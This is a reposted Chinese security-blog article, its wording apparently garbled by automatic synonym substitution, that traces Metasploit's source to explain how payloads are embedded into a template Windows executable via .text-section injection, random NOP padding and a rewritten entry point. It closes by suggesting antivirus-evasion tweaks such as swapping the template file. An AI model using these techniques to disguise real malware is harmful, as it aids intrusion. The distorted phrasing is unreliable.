Metasploit将payload生成exe文件的原理探讨

Metasploit将payload天生exe文件的情理探求

metasploit提供的器械msfpayload和msfencode都支持将payload天生exe可履行文件的格式，但具体的天生机制并无文档阐明，幸好这些器械和库文件但凡开源的，下面我们来1探终究。

在msfpayload源码中概略看到，参数X支持天生exe格式文件:

Default def usage $stderr.puts("\n" + " Usage: #{$0} [<options>] <payload> [var=val] <[S]u妹妹ary| C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>\n" + $args.usage) exit end

1２3456

def usage     $stderr.puts("\n" +      "    Usage: #{$0} [<options>] <payload> [var=val] <[S]u妹妹ary|  C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>\n" +      $args.usage)     exit    end

而参数X的处理例程以下：

Default if (cmd =~ /^x/) note = "Created by msfpayload (http://www.metasploit.com).\n" + "Payload: " + payload.refname + "\n" + " Length: " + buf.length.to_s + "\n" + "Options: " + options.inspect + "\n" arch = payload.arch plat = payload.platform.platforms exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf) if(!exe and plat.index(Msf::Module::Platform::Java)) exe = payload.generate_jar.pack end if(exe) $stderr.puts(note) $stdout.write(exe) exit(0) end $stderr.puts "No executable format support for this arch/platform" exit(-1) end

1２3456七8910111２131415161七1819２0

if (cmd =~ /^x/)          note =               "Created by msfpayload (http://www.metasploit.com).\n" +               "Payload: " + payload.refname + "\n" +               " Length: " + buf.length.to_s + "\n" +               "Options: " + options.inspect + "\n"          arch = payload.arch          plat = payload.platform.platforms          exe  = Msf::Util::EXE.to_executable($framework, arch, plat, buf)          if(!exe and plat.index(Msf::Module::Platform::Java))               exe = payload.generate_jar.pack          end          if(exe)               $stderr.puts(note)               $stdout.write(exe)               exit(0)          end          $stderr.puts "No executable format support for this arch/platform"          exit(-1)     end

次假如调用了Msf::Util::EXE库的to_executable动作，我们在这个库中找到相应的函数以下：

Default def self.to_executable(framework, arch, plat, code='', opts={}) if (arch.index(ARCH_X86)) if (plat.index(Msf::Module::Platform::Windows)) return to_win3２pe(framework, code, opts) end ....

1２3456

def self.to_executable(framework, arch, plat, code='', opts={})                if (arch.index(ARCH_X86))                        if (plat.index(Msf::Module::Platform::Windows))                                return to_win3２pe(framework, code, opts)                        end                        ....

 

终极调用了to_win3２pe函数,下面我们来看看这个函数的1些关键地方:

Default set_template_default(opts, “template_x86_windows.exe”)

1	set_template_default(opts, “template_x86_windows.exe”)

这个函数设置了天生exe的模板文件的地位 跟踪这个函数发明模板文件操作的metasploit部署目次的msf3/data/templates /template_x86_windows.exe文件。鉴于天生的exe文件被杀得相比求助，这个模板文件多几许少也脱不了关连，我们概略找个”清 白”的exe文件来调换这个模板，留意别改文件名。别外msfencode的-x选项支持自定义模板。

Default payload = win3２_rwx_exec(code)

1	payload = win3２_rwx_exec(code)

 

这个函数应用汇编代码调用win3２ api VirtualAlloc乞求了1片可读可写可履行的内存块，并将原始payload拷贝到这里，以支持msfencode里调用种种编码器对原始payload终了处理。

从此等于pe格式综合，获得模板文件的PE可履行段(.text)，判断其大小，并将其地址保留到mines数组中：

Default if(not text) raise RuntimeError, "No .text section found in the template" end if ! text.contains_rva?(pe.hdr.opt.AddressOfEntryPoint) raise RuntimeError, "The .text section does not contain an entry point" end if(text.size < (payload.length + ２56)) raise RuntimeError, "The .text section is too small to be usable" end # Store some useful offsets off_ent = pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint) off_beg = pe.rva_to_file_offset(text.base_rva) # We need to make sure our injected code doesn't conflict with the # the data directories stored in .text (import, export, etc) mines = [] pe.hdr.opt['DataDirectory'].each do |dir| next if dir.v['Size'] == 0 next if not text.contains_rva?( dir.v['VirtualAddress'] ) mines << [ pe.rva_to_file_offset(dir.v['VirtualAddress']) - off_beg, dir.v['Size'] ] end

1２3456七8910111２131415161七1819２0２1２2

if(not text)     raise RuntimeError, "No .text section found in the template"     end     if ! text.contains_rva?(pe.hdr.opt.AddressOfEntryPoint)       raise RuntimeError, "The .text section does not contain an entry point"     end     if(text.size < (payload.length + ２56))       raise RuntimeError, "The .text section is too small to be usable"     end      # Store some useful offsets     off_ent = pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint)     off_beg = pe.rva_to_file_offset(text.base_rva)      # We need to make sure our injected code doesn't conflict with the     # the data directories stored in .text (import, export, etc)     mines = []     pe.hdr.opt['DataDirectory'].each do |dir|     next if dir.v['Size'] == 0     next if not text.contains_rva?( dir.v['VirtualAddress'] )     mines << [ pe.rva_to_file_offset(dir.v['VirtualAddress']) - off_beg, dir.v['Size'] ]     end

将text段分割成连气儿的块，将payload保留到最大的块中：

Default # Break the text segment into contiguous blocks blocks = [] bidx = 0 mines.sort{|a,b| a[0] <=> b[0]}.each do |mine| bbeg = bidx bend = mine[0] if(bbeg != bend) blocks << [bidx, bend-bidx] end bidx = mine[0] + mine[1] end # Add the ending block if(bidx < text.size - 1) blocks << [bidx, text.size - bidx] end # Find the largest contiguous block blocks.sort!{|a,b| b[1]<=>a[1]} block = blocks[0] # TODO: Allow the entry point in a different block if(payload.length + ２56 > block[1]) raise RuntimeError, "The largest block in .text does not have enough contiguous space (need:#{payload.length+２56} found:#{block[1]})" end # Make a copy of the entire .text section data = text.read(0,text.size) # Pick a random offset to store the payload poff = rand(block[1] - payload.length - ２56)

1２3456七8910111２131415161七1819２0２1２2２3２4２5２6

# Break the text segment into contiguous blocks    blocks = []    bidx   = 0    mines.sort{|a,b| a[0] <=> b[0]}.each do |mine|         bbeg = bidx         bend = mine[0]         if(bbeg != bend)              blocks << [bidx, bend-bidx]         end         bidx = mine[0] + mine[1]    end    # Add the ending block    if(bidx < text.size - 1)          blocks << [bidx, text.size - bidx]    end    # Find the largest contiguous block    blocks.sort!{|a,b| b[1]<=>a[1]}       block = blocks[0]    # TODO: Allow the entry point in a different block       if(payload.length + ２56 > block[1])            raise RuntimeError, "The largest block in .text does not have enough contiguous space (need:#{payload.length+２56} found:#{block[1]})"       end    # Make a copy of the entire .text section    data = text.read(0,text.size)    # Pick a random offset to store the payload    poff = rand(block[1] - payload.length - ２56)

在另外块中天生大量的随机nops指令,随机天生pe的入口点，但需确保入口点在nops指令块中，在nops块的末端操作跳转指令跳转到payload地址履行。

Default # Pad the entry point with random nops entry = generate_nops(framework, [ARCH_X86], rand(２00)+51) ... # Relative jump from the end of the nops to the payload entry += "\xe9" + [poff - (eidx + entry.length + 5)].pack('V')

1２3456

# Pad the entry point with random nops    entry = generate_nops(framework, [ARCH_X86], rand(２00)+51)    ...     # Relative jump from the end of the nops to the payload    entry += "\xe9" + [poff - (eidx + entry.length + 5)].pack('V')

 

末端是pe文件的构造，修改入口点为上面的入口点地址，修改时间戳，查验和等，并保留为exe文件。

归结起来，对模板文件的最大修改是将编码的payload保留到.text段中，天生nops指令和修改入口点，稀奇是对入口点的随机修改有明确的酬谢痕 迹，这种exe的天生行动已经被大部门杀软问鼎黑名单中。 乘乐趣的读者概略何等天生不带工作payload的exe文件并上传到virustotal上终了考证:

Default echo -n | msfencode -e generic/none -t exe > myn.exe [*] generic/none succeeded with size 0 (iteration=1)

1	echo -n | msfencode -e generic/none -t exe > myn.exe [*] generic/none succeeded with size 0 (iteration=1)

清楚了情理，免杀就相比冗杂了，概略另外增加区段或不修改入口点间接将payload从入口点末尾覆盖等，施展你的聪明材干吧。

link:http://www.kissthink.com/archive/3695.html

本文由网络安然攻防研究室(www.91ri.org)动态安然小组收集整顿，转载请注明情由。